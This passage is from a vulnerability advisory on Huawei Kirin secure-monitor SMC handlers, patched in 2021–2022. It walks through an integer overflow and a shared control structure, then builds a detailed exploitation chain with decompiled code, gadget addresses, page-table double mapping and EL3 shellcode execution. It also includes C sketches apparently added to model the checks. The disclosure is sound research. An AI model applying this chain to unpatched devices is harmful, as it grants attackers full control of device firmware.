Step 9: When writing the copy, we change the AP and PXN bits of the descriptors, to make the mapping writable. We can now patch the secure monitor's code using our write primitive and get code execution at EL3.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

Kirin 810: P40 Lite (JNY)

Please note that other models might have been affected.

Patch

This vulnerability was assigned CVE-2021-39994 and patched in the February 2022 security update.

Timeline

Aug. 09, 2021 - A vulnerability report is sent to Huawei PSIRT.
Aug. 26, 2021 - Huawei PSIRT acknowledges the vulnerability report.
Feb. 01, 2022 - The issue is fixed in the February 2022 update.

SMC MNTN OOB Access

Vulnerability Details

In addition to acting as a passthrough for the kernel to send commands to and receive responses from the Secure Element (SE), the secure monitor also offers a way to retrieve the SE's logs. This is done in a similar way to the logging system of the security hypervisor, which uses a shared memory buffer.

On the kernel side, the logs of the SE are managed, among other things, by the "hisee mntn" driver. This driver can be found in drivers/hisi/mntn/hisee/hisee_mntn.c and makes use of the HISEE_MNTN_ID SMC (0xC500CC00) to communicate with the secure monitor. This SMC has four commands defined in the hisee_mntn_smc_cmd enumeration below.

▸ drivers/hisi/mntn/hisee/hisee_mntn.h

typedef enum {
    HISEE_SMC_INIT = 1,
    HISEE_SMC_GET_LOG,      /*save all log data when hisee reset*/
    HISEE_SMC_LOG_OUT,      /*get log print of hisee when it is running*/
    HISEE_SMC_GET_VOTE      /*get vote value of hisee pwr state*/
} hisee_mntn_smc_cmd;

The first command, HISEE_SMC_INIT, is used by the kernel to inform the secure monitor of the physical address and size of the shared memory buffer to use. The command is called from the hisee_mntn_probe function, which allocates the shared buffer by calling dma_alloc_coherent.

▸ drivers/hisi/mntn/hisee/hisee_mntn.c

static int hisee_mntn_probe(struct platform_device *pdev)
{
    // ...
    atfd_hisi_service_hisee_mntn_smc(
        (u64)HISEE_MNTN_ID,         /* SMC handler ID */
        (u64)HISEE_SMC_INIT,        /* SMC MNTN Command ID */
        hisee_log_phy,              /* Shared log buffer physical address */
        (u64)hisee_info.log_len);   /* Shared info size */
    // ...
}

The commands HISEE_SMC_GET_LOG and HISEE_SMC_LOG_OUT are used to make the secure monitor write the SE's logs into the shared memory buffer, the first one when the SE is being reset, and the second one when it is executing.

The vulnerable command is HISEE_SMC_INIT. It is handled in the hisee_mntn_smc_handler function, the handler for the HISEE_MNTN_ID SMC.

uint64_t hisee_mntn_smc_handler(
        uint32_t smc_fid,
        uint64_t cmd,
        uint64_t buf_addr,
        uint64_t buf_size,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // ...
    switch (cmd) {
        case HISEE_SMC_INIT:
            // Check (improperly) that the buffer is in the address range 0x3c000000-0x40000000.
            if (buf_addr >= 0x3c000000 && buf_addr + buf_size - 1 < 0x40000000) {
                // Fill the control structure at the beginning of the log buffer.
                header = (hlog_header_t*)buf_addr;
                header->addr = buf_addr + 0x18;
                header->max_size = buf_size - 0x18;
                header->real_size = 0;
                // Save the log buffer physical address in a global variable.
                g_hisee_log_buffer = buf_addr;
            }
            break;
        // ...
    }
    return 0;
}

The vulnerability we identified is twofold. Firstly, the checks performed on the buffer address and size don't account for integer overflows. Secondly, the control structure used by the secure monitor is located in a shared memory region and contains a pointer that can be arbitrarily modified.

Integer Overflow

The first issue lies in the checks performed on the shared memory buffer's address and size. The two conditions to satisfy are:

buf_addr >= 0x3C000000
buf_addr + buf_size <= 0x40000000

However, these checks allow integer overflows. It's possible to provide a buffer address higher than 0x40000000 and then adapt the buffer size to make the addition buf_addr + buf_size overflow. The result will then be smaller than 0x40000000, and the checks will pass.

As an example, we can take the address 0xDEADBEEF and the size 0xFFFFFFFF21524111.

0xDEADBEEF is larger than 0x3C000000, so it passes the first check;
0xDEAD_BEEF + 0xFFFF_FFFF_2152_4111 = 0x0 (on 64-bit platforms), thus passing the second check.
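The wrap-around can be reproduced on any 64-bit host. The sketch below implements the range test in two forms: as stated in the two conditions above, and as written in the decompiled handler listing, which subtracts 1 before comparing. The function names are ours. One observation from the model: if the listing's form is the one actually compiled, a sum of exactly zero wraps back to 0xFFFFFFFFFFFFFFFF after the subtraction, so the size has to be picked so that the sum lands on a small non-zero value instead.

```c
#include <assert.h>
#include <stdint.h>

/* Range test as stated in the text. */
static int check_as_described(uint64_t buf_addr, uint64_t buf_size)
{
    return buf_addr >= 0x3c000000ULL &&
           buf_addr + buf_size <= 0x40000000ULL;
}

/* Range test as written in the decompiled handler listing. */
static int check_as_listed(uint64_t buf_addr, uint64_t buf_size)
{
    return buf_addr >= 0x3c000000ULL &&
           buf_addr + buf_size - 1 < 0x40000000ULL;
}

/* Size for which buf_addr + size equals `target` modulo 2^64. */
static uint64_t wrapping_size(uint64_t buf_addr, uint64_t target)
{
    return target - buf_addr;
}

/* Usage example with the address used in the text. */
static void overflow_example(void)
{
    const uint64_t addr = 0xdeadbeefULL;

    assert(wrapping_size(addr, 0) == 0xffffffff21524111ULL);
    assert(check_as_described(addr, wrapping_size(addr, 0)));
    assert(check_as_listed(addr, wrapping_size(addr, 1)));
}
```

In both forms, an address well above 0x40000000 is accepted as long as the size is chosen to make the unsigned addition wrap.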

We can then abuse the rest of the function to perform writes at addresses relative to our chosen buffer address, using the following three statements.

header->addr = buf_addr + 0x18;
header->max_size = buf_size - 0x18;
header->real_size = 0;

Note: There are still restrictions on the values buf_addr (and thus header) can take. They can only range from 0x3C000000 to 0xFFFFFFFFFFFFFFFF, which means we cannot write into the secure monitor's memory sections using this integer overflow alone, since the monitor is mapped at address 0x14000000.

Shared Control Structure

The second issue is related to the control structure hlog_header used to keep track of the current position within the shared memory buffer.

typedef struct hlog_header {
    uint64_t addr;
    uint64_t max_size;
    uint64_t real_size;
} hlog_header_t;

This structure is located at the beginning of the shared memory buffer provided by the kernel. The kernel is thus able to modify its fields at any time, including while they are being used by the secure monitor. Most importantly, the field addr, the address where the logs will be written, can be modified by the kernel long after the checks have been performed by hisee_mntn_smc_handler.

We'll see in the next section how these bugs can be combined to craft an exploit that achieves reliable code execution in EL3 from NS-EL1.

Exploitation

In this section, we describe the exploit and the different primitives we constructed to get arbitrary code execution at EL3 from the kernel.

Arbitrary Memset Primitive

The first primitive we crafted allows us to perform a memset of an arbitrary memory range. To do this, we use the command HISEE_SMC_GET_LOG which sets g_hisee_log_buffer->real_size to 0 before calling the hisee_save_log function.

uint64_t hisee_mntn_smc_handler(
        uint32_t smc_fid,
        uint64_t cmd,
        uint64_t buf_addr,
        uint64_t buf_size,
        uint64_t x4,
        void *cookie,
        void *handle,
        uint64_t flags) {
    // ...
    switch (cmd) {
        case HISEE_SMC_GET_LOG:
            if (g_hisee_log_buffer) {
                g_hisee_log_buffer->real_size = 0;
                ret = hisee_save_log(0xf0e23800, 0x7b0);
            }
            break;
        // ...
    }
    return 0;
}

hisee_save_log performs a memcpy_s from 0xF0E23800 to g_hisee_log_buffer->addr + g_hisee_log_buffer->real_size. As we've seen in HISEE_SMC_INIT, g_hisee_log_buffer points to the control structure at the beginning of the shared memory buffer. So by using the second bug, we can make g_hisee_log_buffer->addr (but not g_hisee_log_buffer) point to any address, including the secure monitor's sections.

uint64_t hisee_save_log(uint64_t addr, uint64_t size) {
    // ...
    // Sanity-check on the argument values.
    if (!size || !g_hisee_log_buffer || !get_hisee_state())
        return -1;
    // Copy the logs to the shared memory buffer.
    res = memcpy_s(
        g_hisee_log_buffer->real_size + g_hisee_log_buffer->addr,
        g_hisee_log_buffer->max_size,
        addr,
        size);
    if (res)
        return -1;
    // Increment the current size in the control structure.
    g_hisee_log_buffer->real_size += size;
    return res;
}

An interesting property of memcpy_s is that if any of the checks it does fails, it calls the function reset_memory.

uint64_t memcpy_s(char *dst, uint64_t dst_len, char *src, uint64_t src_len) {
    // Sanity-check on the argument values, and the source and destination buffers.
    if (src_len > dst_len || !dst || !src || dst_len >= 0x80000000 || !src_len
            || (src >= dst || dst < src + src_len) && (dst >= src || src < dst + src_len)) {
        // Call reset_memory to ensure no uninitialized memory from the destination buffer leaks.
        return reset_memory(dst, dst_len, src, src_len);
    }
    // Call memcpy that does the actual copy.
    memcpy(dst, src, src_len);
    return 0;
}

And reset_memory is a wrapper around calls to memset that reset the destination memory to zero.

uint64_t reset_memory(char *dst, uint64_t dst_len, char *src, uint64_t src_len) {
    // ...
    if (dst_len < 0x80000000) {
        if (dst && src) {
            if (src_len <= dst_len) {
                if (src < dst && dst < src + src_len || dst < src && src < dst + src_len) {
                    memset(dst, 0, dst_len);
                }
            } else {
                memset(dst, 0, dst_len);
            }
        } else {
            if (dst) {
                memset(dst, 0, dst_len);
            }
        }
    }
    // ...
}

By looking at the conditions in memcpy_s and reset_memory, we can see that if the destination length (the max_size field) is smaller than the source length (0x7B0), memcpy_s fails its first check and reset_memory zeroes max_size bytes at the destination. We can therefore perform a memset of the destination buffer with any size smaller than 0x7B0.
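To make this path concrete, here is a user-space transcription of the two functions shown above. It is a sketch rather than the monitor's code: the `model_` names are ours, pointers are compared as integers, and the return value of `model_reset_memory` is an assumption because the original one is elided.

```c
#include <stdint.h>
#include <string.h>

uint64_t model_reset_memory(char *dst, uint64_t dst_len, const char *src, uint64_t src_len) {
    uintptr_t d = (uintptr_t)dst, s = (uintptr_t)src;
    if (dst_len < 0x80000000) {
        if (dst && src) {
            if (src_len <= dst_len) {
                if ((s < d && d < s + src_len) || (d < s && s < d + src_len))
                    memset(dst, 0, (size_t)dst_len);
            } else {
                /* Path abused by the exploit: source longer than destination. */
                memset(dst, 0, (size_t)dst_len);
            }
        } else if (dst) {
            memset(dst, 0, (size_t)dst_len);
        }
    }
    return (uint64_t)-1; /* assumption: any non-zero error code */
}

uint64_t model_memcpy_s(char *dst, uint64_t dst_len, const char *src, uint64_t src_len) {
    uintptr_t d = (uintptr_t)dst, s = (uintptr_t)src;
    if (src_len > dst_len || !dst || !src || dst_len >= 0x80000000 || !src_len
            || ((s >= d || d < s + src_len) && (d >= s || s < d + src_len))) {
        return model_reset_memory(dst, dst_len, src, src_len);
    }
    memcpy(dst, src, (size_t)src_len);
    return 0;
}
```

Calling `model_memcpy_s(target, 1, logs, 0x7B0)` copies nothing and zeroes exactly one byte of `target`, which is the behavior the primitive relies on.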

However, there is still one condition to meet before we can use this primitive, which is passing the first check in hisee_save_log:

if (!size || !g_hisee_log_buffer || !get_hisee_state())
    return -1;

The size and log buffer pointer will be non-zero for this call, but we still need to make sure that get_hisee_state returns a non-zero value. That is the case when the extract_bit_11_from_0xfff0a434 function also returns a non-zero value.

uint64_t get_hisee_state() {
    uint64_t state = 0;
    spin_lock(g_lock);
    if (extract_bit_11_from_0xfff0a434()) {
        state = 1;
        // ...
    }
    spin_unlock(g_lock);
    return state;
}

And this happens when the 11th bit from the quad-word at address 0xFFF0A434 is set.

uint64_t extract_bit_11_from_0xfff0a434() {
    return ((*(uint64_t*)0xfff0a434) >> 11) & 1;
}

To make sure that this bit is set, we can use the first bug affecting the command HISEE_SMC_INIT (the integer overflow) to write 1 << 11 = 0x800 at address 0xFFF0A434 (which is greater than 0x3C000000). When specifying buffer address X to this command, the following values are written:

| Field | Offset | Possible Values |
| --- | --- | --- |
| `addr` | `0x00` | `X + 0x18` |
| `max_size` | `0x08` | From `-(X + 0x18)` to `-(X + 0x18) + 0x40000000` |
| `real_size` | `0x10` | `0` |

We can fully control the 3 least significant bytes of the field max_size by adjusting the buffer size given to the command. This is enough to satisfy the check at the beginning of hisee_save_log and start working towards crafting read/write primitives.
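The arithmetic behind the table can be worked through with a short model. It rests on assumptions inferred from the table rather than on the handler's code: that max_size is the buffer size minus 0x18, and that the only upper-bound check is on the wrapped 64-bit sum of address and size. All function names are hypothetical.

```c
#include <stdint.h>

#define HLOG_HEADER_SIZE 0x18u

typedef struct {
    uint64_t addr, max_size, real_size;
} init_fields_t;

/* Values stored at X, X + 8 and X + 0x10, as listed in the table. */
init_fields_t model_init_fields(uint64_t x, uint64_t buf_size) {
    init_fields_t f = { x + HLOG_HEADER_SIZE, buf_size - HLOG_HEADER_SIZE, 0 };
    return f;
}

/* Assumed bound check: the buffer end, computed with wrap-around, is below 0x40000000. */
int model_end_check_passes(uint64_t x, uint64_t buf_size) {
    return x + buf_size < 0x40000000u;
}

/* Pick a buffer size such that the 3 low bytes of max_size equal low24. */
uint64_t pick_buf_size(uint64_t x, uint32_t low24) {
    uint64_t min_max_size = (uint64_t)0 - (x + HLOG_HEADER_SIZE); /* -(X + 0x18) */
    uint64_t delta = ((uint64_t)low24 - min_max_size) & 0xFFFFFF;
    return min_max_size + delta + HLOG_HEADER_SIZE;
}
```

With X = 0xFFF0A434 - 8, the max_size field lands exactly on the quad-word read by extract_bit_11_from_0xfff0a434, and `pick_buf_size(X, 0x800)` yields a size for which the wrapped end address stays small while the 3 low bytes of max_size are 0x000800.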

Arbitrary Read-Write Primitives

Control-Flow Hijacking

The next step of the exploit is to craft arbitrary read/write primitives using our memset primitive. We can do this by changing one of the many function pointers present in the data section to hijack the monitor's secure execution flow.

The idea is to find a function pointer that is easily reachable from an SMC and that will point to an interesting gadget once we set one or more of its bytes to zero. This is highly dependent on the secure monitor version. On our test device, the version was v1.5(debug):6458010.

We chose to modify one of the SMC handler pointers of the bl31_secap_svc runtime service.

ops_t bl31_secap_smc_handlers[] = {
    /* 0x14028178: */ {0xca000001, func_14003148},
    /* 0x14028188: */ {0xca000002, func_14003140},
    /* 0x14028198: */ {0xca000008, func_1400382c},
};

The SMC handler pointer we targeted is located at address 0x140281A0 and points to the function at 0x1400382C. We chose this one in particular because there is an interesting BLR X2 gadget at 0x14003800 that lets us call an arbitrary function:

0x14003800: cbnz x2, 0x14003820
[...]
0x14003820: blr x2

By using our memset primitive to set the least significant byte to 0, we are able to change the pointer value from 0x1400382C to 0x14003800 (the above gadget). This is achieved in our exploit by performing the operations listed below.

Set the 11th bit in the quad-word at 0xFFF0A434 so that get_hisee_state returns true.
Call HISEE_SMC_INIT with a buffer size of 0x18+1, so that max_size is 1 once 0x18 has been subtracted from it.
Set the addr field of the control structure from the kernel to 0x140281A0, our function pointer.
Trigger the memset of the function pointer LSB by invoking the HISEE_SMC_GET_LOG command.
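The effect of that one-byte memset on the stored pointer can be checked with a small sketch. The helper names are hypothetical, and the pointer is laid out explicitly in little-endian order, which is the layout implied by the least significant byte sitting at the pointer's own address.

```c
#include <stdint.h>
#include <string.h>

/* Store a 64-bit value as little-endian bytes. */
void store_le64(uint8_t out[8], uint64_t value) {
    for (int i = 0; i < 8; i++)
        out[i] = (uint8_t)(value >> (8 * i));
}

/* Load a 64-bit value from little-endian bytes. */
uint64_t load_le64(const uint8_t in[8]) {
    uint64_t value = 0;
    for (int i = 0; i < 8; i++)
        value |= (uint64_t)in[i] << (8 * i);
    return value;
}

/* Effect of a memset of max_size zero bytes starting at the pointer's address. */
uint64_t zero_low_bytes(uint64_t pointer, size_t max_size) {
    uint8_t bytes[8];
    store_le64(bytes, pointer);
    memset(bytes, 0, max_size < 8 ? max_size : 8);
    return load_le64(bytes);
}
```

For a buffer size of 0x18+1, `zero_low_bytes(0x1400382C, 1)` gives 0x14003800, the address of the gadget.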

Now let's detail how we can leverage this gadget to build stronger primitives.

The function pointer we hijacked is used in bl31_secap_handler (0x14003838), which is just a wrapper for the SMC handlers in the bl31_secap_smc_handlers array. The arguments passed from NS-EL1, except for smc_fid, are moved into X0-X3 at the call site.

0x1400394c:  mov x2, x3
0x14003950:  mov x0, x22
0x14003954:  mov x1, x21
0x14003958:  mov x3, x4
0x1400395c:  blr x6        /* address of the blr x2 gadget */

Looking at the assembly calling the handler (now our BLR X2 gadget), we can see that we control the following registers:

X0 == X22
X1 == X21
X2 == X3
X3 == X4

X2 must contain the address of the gadget we will jump to after calling the BLR X2 gadget. Now we just need to find an interesting gadget that uses any of the other registers we control to enhance our current primitive.

We'll start by looking for an arbitrary write gadget.

Basic Arbitrary Write

Once again, in a code base as large as the monitor, it's not too hard to find such a gadget. However, we still need to take into account the fact that the branch instruction is a BLR, meaning that we lose the original return address in the LR register. Nonetheless, we can reuse the same technique as in our first exploit: the return address stored in the bl31_secap_handler's stack frame can be retrieved by using a gadget with the same epilogue (or at least the same stack frame size). This way, we can return cleanly to the runtime service dispatcher.

The epilogue of bl31_secap_handler below restores the saved registers and adds 0x50 to the stack pointer before returning:

0x14003974:  ldp x19, x20, [sp,#0x10]
0x14003978:  ldp x21, x22, [sp,#0x20]
0x1400397c:  ldp x29, x30, [sp],#0x50
0x14003980:  ret

The arbitrary write gadget we're using, found at address 0x14001850, does the same thing and will therefore return properly:

0x14001850:  str w21, [x0]
0x14001854:  ldr x25, [sp,#0x40]
0x14001858:  ldp x21, x22, [sp,#0x20]
0x1400185c:  ldp x29, x30, [sp],#0x50
0x14001860:  ret

Once the SMC handler pointer has been replaced with the address of our BLR X2 gadget, we can call the corresponding SMC from the kernel with the arguments listed below to perform arbitrary writes.

X0: the hijacked SMC ID, 0xCA000008;
X1: the address we want to write to;
X2: the value we want to write;
X3: the address of the arbitrary write gadget to be called by the BLR X2 gadget.
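The whole chain, from the SMC arguments to the store, can be followed in a small simulation. This is a model under assumptions, not monitor code: memory is a local array with a hypothetical base address, the gadgets are C functions, and we assume X22 and X21 hold the SMC's X1 and X2, as the argument list above suggests.

```c
#include <stdint.h>
#include <string.h>

#define GADGET_BLR_X2 0x14003800u  /* hijacked handler: branches to X2 */
#define GADGET_WRITE  0x14001850u  /* str w21, [x0] */
#define MODEL_BASE    0x14028000u  /* hypothetical base of the modeled memory */

static uint8_t g_memory[0x1000];   /* stand-in for the monitor's data */

/* Registers as seen by the handler after the moves at the call site. */
typedef struct { uint64_t x0, x1, x2, x3, x21, x22; } regs_t;

static void gadget_write(regs_t *r) {
    uint32_t w21 = (uint32_t)r->x21;
    uint64_t off = r->x0 - MODEL_BASE;
    if (off <= sizeof(g_memory) - sizeof(w21))  /* ignore writes outside the model */
        memcpy(&g_memory[off], &w21, sizeof(w21));
}

static void gadget_blr_x2(regs_t *r) {
    if (r->x2 == GADGET_WRITE)     /* the model only knows this one target */
        gadget_write(r);
}

/* X1..X4 as passed from the kernel along with SMC ID 0xCA000008. */
void model_smc_secap(uint64_t smc_x1, uint64_t smc_x2, uint64_t smc_x3, uint64_t smc_x4) {
    regs_t r;
    r.x22 = smc_x1;   /* assumption: argument kept in X22 */
    r.x21 = smc_x2;   /* assumption: argument kept in X21 */
    r.x2 = smc_x3;    /* mov x2, x3 */
    r.x0 = r.x22;     /* mov x0, x22 */
    r.x1 = r.x21;     /* mov x1, x21 */
    r.x3 = smc_x4;    /* mov x3, x4 */
    gadget_blr_x2(&r); /* blr x6, now the BLR X2 gadget */
}

/* Read back 32 bits of modeled memory. */
uint32_t model_peek32(uint64_t addr) {
    uint32_t value = 0;
    memcpy(&value, &g_memory[addr - MODEL_BASE], sizeof(value));
    return value;
}
```

A call such as `model_smc_secap(0x14028190, 0x14001A74, GADGET_WRITE, 0)` stores the 32-bit value at the modeled address, mirroring how the temporary primitive overwrites a handler pointer.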

Full Arbitrary Read-Write

The next step of the exploit is to get better read/write primitives by modifying yet again the SMC handler pointers of bl31_secap_svc.

The handler pointer for SMC 0xCA000002 (at address 0x14028190) is changed to 0x14001A74, which is an arbitrary read gadget:

0x14001a74:  ldr w0, [x0,x1]
0x14001a78:  ret

The handler pointer for SMC 0xCA000008 (at address 0x140281A0) is changed to 0x1400AC70, which is an arbitrary write gadget:

0x1400ac70:  str x1, [x0]
0x1400ac74:  ret

At this stage, we have stable read/write primitives and we can now start working towards arbitrary code execution.
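Since the read gadget loads a 32-bit word at X0 + X1, wider reads have to be assembled from several calls. The sketch below shows one way to do it. The `read32_fn` callback is a hypothetical wrapper around SMC 0xCA000002, assuming the loaded word comes back to the kernel as the SMC's return value, and `fake_read32` is only a stand-in backend so the example runs in user space.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical backend: issues SMC 0xCA000002, i.e. ldr w0, [x0, x1]. */
typedef uint32_t (*read32_fn)(uint64_t base, uint64_t offset);

/* Assemble a little-endian 64-bit value from two 32-bit reads. */
uint64_t el3_read64(read32_fn read32, uint64_t addr) {
    uint64_t lo = read32(addr, 0);
    uint64_t hi = read32(addr, 4);
    return lo | (hi << 32);
}

/* Read count consecutive 32-bit words starting at addr. */
void el3_read_words(read32_fn read32, uint64_t addr, uint32_t *out, size_t count) {
    for (size_t i = 0; i < count; i++)
        out[i] = read32(addr, 4 * (uint64_t)i);
}

/* Stand-in backend over a small fake memory region. */
#define FAKE_BASE 0x14028178u
static const uint32_t g_fake_words[4] = {
    0x11223344, 0x55667788, 0x99aabbcc, 0xddeeff00
};

uint32_t fake_read32(uint64_t base, uint64_t offset) {
    uint64_t index = (base + offset - FAKE_BASE) / 4;
    return index < 4 ? g_fake_words[index] : 0;
}
```

The 64-bit write gadget needs no such composition, since `str x1, [x0]` already stores a full quad-word.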

Double Mapping the Secure Monitor

To get code execution in the secure monitor, we use the same strategy as in our first exploit: map the secure monitor a second time as writable. The third-level EL3 page table mapping the secure monitor's code and data sections is located by finding the descriptors mapping the physical address 0x14000000. The double mapping is achieved by copying the descriptors into the unused space of the page table and changing the AP and PXN bits of the new descriptors. This read-write mapping, starting at virtual address 0x14058000, can then be used to patch the monitor code.
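The descriptor manipulation can be sketched as follows, on a local copy of a level-3 table. Several things here are assumptions: a 4KB granule, the standard ARMv8-A stage 1 descriptor layout (AP[2] at bit 7, PXN at bit 53), PXN being set rather than cleared in the alias, and the page count passed to `double_map`. In the actual exploit, the entries are read and written through the primitives built earlier.

```c
#include <stdint.h>

#define DESC_AP_RO   (1ull << 7)   /* AP[2]: set means read-only */
#define DESC_PXN     (1ull << 53)
#define PAGE_SHIFT   12
#define L3_ENTRIES   512u

#define MONITOR_BASE 0x14000000ull
#define ALIAS_BASE   0x14058000ull

/* Index of a virtual address in its level-3 table (4KB granule assumed). */
unsigned l3_index(uint64_t va) {
    return (unsigned)((va >> PAGE_SHIFT) & (L3_ENTRIES - 1));
}

/* Same output address, but writable. Setting PXN is our assumption. */
uint64_t make_writable_alias(uint64_t desc) {
    desc &= ~DESC_AP_RO;
    desc |= DESC_PXN;
    return desc;
}

/* Copy the first pages descriptors of the monitor into the alias slots. */
void double_map(uint64_t table[L3_ENTRIES], unsigned pages) {
    unsigned src = l3_index(MONITOR_BASE), dst = l3_index(ALIAS_BASE);
    for (unsigned i = 0; i < pages && src + i < L3_ENTRIES && dst + i < L3_ENTRIES; i++)
        table[dst + i] = make_writable_alias(table[src + i]);
}

/* Writable alias of an address inside the monitor image. */
uint64_t alias_of(uint64_t va) {
    return va - MONITOR_BASE + ALIAS_BASE;
}
```

Under these assumptions, the alias starts at index 0x58 of the same table, and code at 0x14003140 becomes writable at 0x1405B140.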

Getting Code Execution in EL3

Finally, we change the first handler pointer (for the SMC 0xCA000001) in bl31_secap_smc_handlers to 0x14003140, write our shellcode at this address, and call this SMC to hijack the secure monitor and get code execution at EL3.

Exploitation Summary

Step 0: The integer overflow in HISEE_SMC_INIT and the kernel-controlled hlog_header shared structure are paired to craft a limited arbitrary write. This limited primitive is not enough to take direct control of the secure monitor, but it can first be used to craft a bzero primitive.

Step 1: When logs are copied from the secure monitor to the kernel-shared memory buffer, the function memcpy_s is used. To create a bzero primitive, we abuse an error case of memcpy_s where it calls reset_memory to zero the destination memory region. However, for hisee_save_log to reach memcpy_s, the 11th bit of the quad-word at address 0xFFF0A434 needs to be set, which we ensure using our limited write primitive.

Step 2: Our bzero primitive can now be used to modify writable data in the secure monitor's address space from the kernel. In our exploit, we targeted the function pointers of the bl31_secap_svc runtime service.

Step 3: By setting the least significant byte of the third function pointer, 0x1400382C, to zero, we can redirect the SMC handler to a BLR X2 gadget found at address 0x14003800.

Step 4: The BLR X2 gadget lets us call a write gadget that shares the epilogue of bl31_secap_handler, which gives us a temporary write primitive.

Step 5: We can now use this temporary write primitive to craft a read primitive, by replacing the function pointer of the second SMC handler with the address of a read gadget.

Step 6: We do the same thing for the third function pointer of the runtime service and replace it with the address of an arbitrary write gadget.

Step 7: We then use the read primitive to locate the EL3 page tables. In one of the pages, we find the descriptor that maps the address 0x14000000, the base address of the secure monitor.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

Kirin 710: P30 Lite (MAR)
Kirin 970: P20 Pro (EML)

Please note that other models might have been affected.

Patch

The first vulnerability, the integer overflow, was assigned CVE-2021-22437 and patched in the September 2021 security update. The second vulnerability, the shared control structure, was assigned CVE-2021-39993 and patched in the December 2021 security update.

Timeline

May 31, 2021 - A vulnerability report is sent to Huawei PSIRT.
Jun. 18, 2021 - Huawei PSIRT acknowledges the vulnerability report.
Sep. 01, 2021 - The first issue is fixed in the September 2021 update.
Dec. 01, 2021 - The second issue is fixed in the December 2021 update.

This advisory contains information about the following vulnerabilities:

CVE-2021-39994 SMC SE Factory Check OOB Access
CVE-2021-22437 SMC MNTN OOB Access (Integer Overflow)
CVE-2021-39993 SMC MNTN OOB Access (Shared Control Structure)
